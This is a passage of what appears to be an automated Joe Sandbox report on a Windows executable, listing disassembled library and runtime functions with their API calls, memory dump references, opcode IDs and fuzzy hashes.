Instruction Fuzzy Hash: 92314821E2C243C5FA24BB6594613B99391AF45385FC45038ED0E5BED3FF6DA805CA35

Function 00007FF76D5D8D48 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF76D5D8D44), ref: 00007FF76D5D8D59
TerminateProcess.KERNEL32(?,?,?,00007FF76D5D8D44), ref: 00007FF76D5D8D64
ExitProcess.KERNEL32 ref: 00007FF76D5D8D73

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
Instruction ID: ac42335e2e26a6da1f525f30612d404407efba4ba97f9ba07958a97e66012497
Opcode Fuzzy Hash: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
Instruction Fuzzy Hash: 4BD01710B3C70AC2EB183B705C6913982111F6C702F802638CC6B06B93ED2CA8088271

Function 00007FF76D5CF45C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5CF4A0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5CF597

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
Instruction ID: 39cb791920302ef4c6ae9983d04cfcaeaa8e7c8e5090be18153ca7926446163f
Opcode Fuzzy Hash: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
Instruction Fuzzy Hash: 1051C661B2E242C6F628BE25940067AE291BF44BB4F944639DE7D47BD7EE3CD4418E30

Function 00007FF76D5D9E68 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF76D5D9CE5,?,?,00000000,00007FF76D5D9D9A), ref: 00007FF76D5D9ED6
GetLastError.KERNEL32(?,?,?,00007FF76D5D9CE5,?,?,00000000,00007FF76D5D9D9A), ref: 00007FF76D5D9EE0

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification
String ID:
API String ID: 1687624791-0
Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
Instruction ID: 8d565cfb5897365f9796d3209cef660bede627e37ac01b6aa85e6b445627a1bf
Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
Instruction Fuzzy Hash: 4021C211F3C64280EA54B761A4B037C92929F847A0F841235DD3E47AD3EE6CA5808739

Function 00007FF76D5DB444 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF76D5DB5DD), ref: 00007FF76D5DB490
GetLastError.KERNEL32(?,?,?,?,?,00007FF76D5DB5DD), ref: 00007FF76D5DB49A

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
Instruction ID: cb5bd3e4cc8b5e057e8bd0dc03b2afb35d142b7d9d3466d5b2ead6f6e8cfeb58
Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
Instruction Fuzzy Hash: BD11C461A2CB81C1DB10FB25B554169A362AB48BF4F940331EE7D07BEAEE7CD1508754

Function 00007FF76D5D9C58 Relevance: 3.0, APIs: 2, Instructions: 19threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF76D5E2032,?,?,?,00007FF76D5E206F,?,?,00000000,00007FF76D5E2535,?,?,?,00007FF76D5E2467), ref: 00007FF76D5D9C6E
GetLastError.KERNEL32(?,?,?,00007FF76D5E2032,?,?,?,00007FF76D5E206F,?,?,00000000,00007FF76D5E2535,?,?,?,00007FF76D5E2467), ref: 00007FF76D5D9C78

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: ErrorLanguagesLastPreferredRestoreThread
String ID:
API String ID: 588628887-0
Opcode ID: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
Instruction ID: 745cbc7dc603e88975c203fe418b648da96f7ad396c209a091e6561646013309
Opcode Fuzzy Hash: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
Instruction Fuzzy Hash: 5FE04F10F2C647C2FB187BB1646517992915F9C782B804030CD1D42A63FE2C68854634

Function 00007FF76D5DB1BC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5DB1E4

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
Instruction ID: f1c944ae47175a2a0f962628a90659ba0569bec227d3d93f9a77630d06030a33
Opcode Fuzzy Hash: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
Instruction Fuzzy Hash: 4F41E63292C201C7EB24BF15A56127DB3A1EB56B80F540131DEAE43A96EF3DE402C775

Function 00007FF76D5C76A0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF76D5C774A

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: 5ded6caf1fd380de2254f36795121f8b4b736111aab3f4dc2bf888ad56e5caf9
Instruction ID: d5ef1775c7c8e26880a6c61200d845f6e558b49e5e7d89331b1a3fb069e53926
Opcode Fuzzy Hash: 5ded6caf1fd380de2254f36795121f8b4b736111aab3f4dc2bf888ad56e5caf9
Instruction Fuzzy Hash: D3219121F2D65685FA10BA16A9043BAE691BF49BD4FC85434DD1D07F83EEBDE041CA30

Function 00007FF76D5DAC4C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5DACD2

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
Instruction ID: bcafe4651ad1ef7a36ab0a2c0a6fafa4312909ee39c45119d71527b8008a285c
Opcode Fuzzy Hash: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
Instruction Fuzzy Hash: 8431A421E2C645C2F7117B15846177EA650AB64BA1F910135ED3D13BE3EFBCE4818739

Function 00007FF76D5D8C79 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF76D5D8CA7

Part of subcall function 00007FF76D5D8DA0: GetModuleHandleExW.KERNEL32 ref: 00007FF76D5D8DC5
Part of subcall function 00007FF76D5D8DA0: GetProcAddress.KERNEL32 ref: 00007FF76D5D8DDB
Part of subcall function 00007FF76D5D8DA0: FreeLibrary.KERNEL32 ref: 00007FF76D5D8E02

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
Instruction ID: c0de4416671398b934e759df0d2bf9c19da8473efbb62c5a5ff14cd5a878841a
Opcode Fuzzy Hash: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
Instruction Fuzzy Hash: F721A132E29705C9EB25AF64C4502FC7BA0FB04318F94563ADA2C0AED6EF38D544CB65

Function 00007FF76D5D52A4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5D5209

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
Instruction ID: 0fda83ee3f10ff6cd6216f0a38b5fca5da58ddacb1e294859f870b8c1bbb622d
Opcode Fuzzy Hash: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
Instruction Fuzzy Hash: 4C118421A2D682C1EA61BF55942017EE264FF56B80FC44431EEAC57E9BEF3CD4408778

Function 00007FF76D5E5664 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5E5687

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
Instruction ID: eef46f1205c2529964929e8f807375d1985ad6d3f4f67a09118ebfc87a25112a
Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
Instruction Fuzzy Hash: 1821A732A2C681C7DB61AF28D450379B7A0EB98B94F944234DE6D47ADAEF3CD440CB10

Function 00007FF76D5CF6DC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5CF730

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
Instruction ID: c75a6dcb5963d74dfd2af19718cdedb5d1ea1223bc91fda18a02d6881dabb32b
Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
Instruction Fuzzy Hash: 9201A521B2C74281E904BB565900079E6D5AB55FE0F884635DE6C13FD7EE3CE4028B20

Function 00007FF76D5D720C Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5D724A

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: bb049028caba5e04dba667320418798f18563eb801bd7df1d5910388d10efff1
Instruction ID: 436f51badd0115fddd3d1ac18402658f831718affad0d1c6ce26bd82ff49325f
Opcode Fuzzy Hash: bb049028caba5e04dba667320418798f18563eb801bd7df1d5910388d10efff1
Instruction Fuzzy Hash: 50015E20E2D6C2C1FAA0BA656561179D290AF597D4FD40134FD7E42ECBFF7DA4404239

Function 00007FF76D5DDEA8 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,00000000,00007FF76D5DA63A,?,?,?,00007FF76D5D43FD,?,?,?,?,00007FF76D5D979A), ref: 00007FF76D5DDEFD

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
Instruction ID: 0dc7e60e3cb84121f66f2fc7a58aad7618ffb42e11caa45fe7b353c5592a7cc8
Opcode Fuzzy Hash: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
Instruction Fuzzy Hash: 40F04F55B2D347C0FE64766558313B5A2909F98B80FC84031CD1E86B87FD2CA4814634

Function 00007FF76D5DC90C Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,?,00007FF76D5CFFB0,?,?,?,00007FF76D5D161A,?,?,?,?,?,00007FF76D5D2E09), ref: 00007FF76D5DC94A

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
Instruction ID: 93b2e833fcd6504b7b8eebb542a3306ea0106ff146cd5c7e8bd45f97efccf994
Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
Instruction Fuzzy Hash: CAF0DA11E3D247C5FE547B61596127991805F4CBA0F884630ED3E45ACBFE6CB5418634

Function 00007FF76D5D7548 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5D7561

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c51c900cc97cfaa1f2463de7ded10a88eb35566439d91f89b12c497efef6b613
Instruction ID: bb78586ccc9a51dea0b1e04acd8ba2d28d81a409b72bc9464b87eaebc419fe59
Opcode Fuzzy Hash: c51c900cc97cfaa1f2463de7ded10a88eb35566439d91f89b12c497efef6b613
Instruction Fuzzy Hash: DEE0EC90E2C247C3FA147AA845E227991109FA8340FC04070DD6A46A83FD2C7885963A

Non-executed Functions

Function 00007FF76D5C6EA0 Relevance: 119.3, APIs: 33, Strings: 35, Instructions: 280libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF76D5C6EB7
GetProcAddress.KERNEL32 ref: 00007FF76D5C6EFD
GetProcAddress.KERNEL32 ref: 00007FF76D5C6F22
GetProcAddress.KERNEL32 ref: 00007FF76D5C6F47
GetProcAddress.KERNEL32 ref: 00007FF76D5C6F6F
GetProcAddress.KERNEL32 ref: 00007FF76D5C6F97
GetProcAddress.KERNEL32 ref: 00007FF76D5C6FBF
GetProcAddress.KERNEL32 ref: 00007FF76D5C6FE7
GetProcAddress.KERNEL32 ref: 00007FF76D5C700F

Strings

Tcl_NewByteArrayObj, xrefs: 00007FF76D5C725D, 00007FF76D5C7279
Tcl_CreateThread, xrefs: 00007FF76D5C6FDD, 00007FF76D5C6FF9
Tcl_Free, xrefs: 00007FF76D5C7375, 00007FF76D5C7391
Tcl_EvalEx, xrefs: 00007FF76D5C72FD, 00007FF76D5C7319
Tcl_FindExecutable, xrefs: 00007FF76D5C6F18, 00007FF76D5C6F34
Tcl_GetVar2, xrefs: 00007FF76D5C7195, 00007FF76D5C71B1
Tcl_GetCurrentThread, xrefs: 00007FF76D5C7005, 00007FF76D5C7021
Tcl_ConditionNotify, xrefs: 00007FF76D5C70F5, 00007FF76D5C7111
Tcl_ConditionFinalize, xrefs: 00007FF76D5C70CD, 00007FF76D5C70E9
GetProcAddress, xrefs: 00007FF76D5C6ED7
Tcl_FinalizeThread, xrefs: 00007FF76D5C6F8D, 00007FF76D5C6FA9
Tcl_MutexUnlock, xrefs: 00007FF76D5C707D, 00007FF76D5C7099
Tk_Init, xrefs: 00007FF76D5C739D, 00007FF76D5C73B9
Tcl_NewStringObj, xrefs: 00007FF76D5C7235, 00007FF76D5C7251
Tcl_JoinThread, xrefs: 00007FF76D5C702D, 00007FF76D5C7049
Tcl_Finalize, xrefs: 00007FF76D5C6F65, 00007FF76D5C6F81
Tcl_GetObjResult, xrefs: 00007FF76D5C72AD, 00007FF76D5C72C9
Tcl_GetString, xrefs: 00007FF76D5C720D, 00007FF76D5C7229
Tk_GetNumMainWindows, xrefs: 00007FF76D5C73C5, 00007FF76D5C73E1
Tcl_CreateObjCommand, xrefs: 00007FF76D5C71E5, 00007FF76D5C7201
Tcl_ThreadAlert, xrefs: 00007FF76D5C716D, 00007FF76D5C7189
Tcl_EvalObjv, xrefs: 00007FF76D5C7325, 00007FF76D5C7341
Tcl_EvalFile, xrefs: 00007FF76D5C72D5, 00007FF76D5C72F1
Tcl_SetVar2, xrefs: 00007FF76D5C71BD, 00007FF76D5C71D9
Tcl_ThreadQueueEvent, xrefs: 00007FF76D5C7145, 00007FF76D5C7161
Failed to get address for %hs, xrefs: 00007FF76D5C6ED0
Tcl_MutexLock, xrefs: 00007FF76D5C7055, 00007FF76D5C7071
Tcl_ConditionWait, xrefs: 00007FF76D5C711D, 00007FF76D5C7139
Tcl_Init, xrefs: 00007FF76D5C6EB0, 00007FF76D5C6EC9
Tcl_CreateInterp, xrefs: 00007FF76D5C6EF3, 00007FF76D5C6F0F
Tcl_DoOneEvent, xrefs: 00007FF76D5C6F3D, 00007FF76D5C6F59
Tcl_MutexFinalize, xrefs: 00007FF76D5C70A5, 00007FF76D5C70C1
Tcl_SetVar2Ex, xrefs: 00007FF76D5C7285, 00007FF76D5C72A1
Tcl_Alloc, xrefs: 00007FF76D5C734D, 00007FF76D5C7369
Tcl_DeleteInterp, xrefs: 00007FF76D5C6FB5, 00007FF76D5C6FD1

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
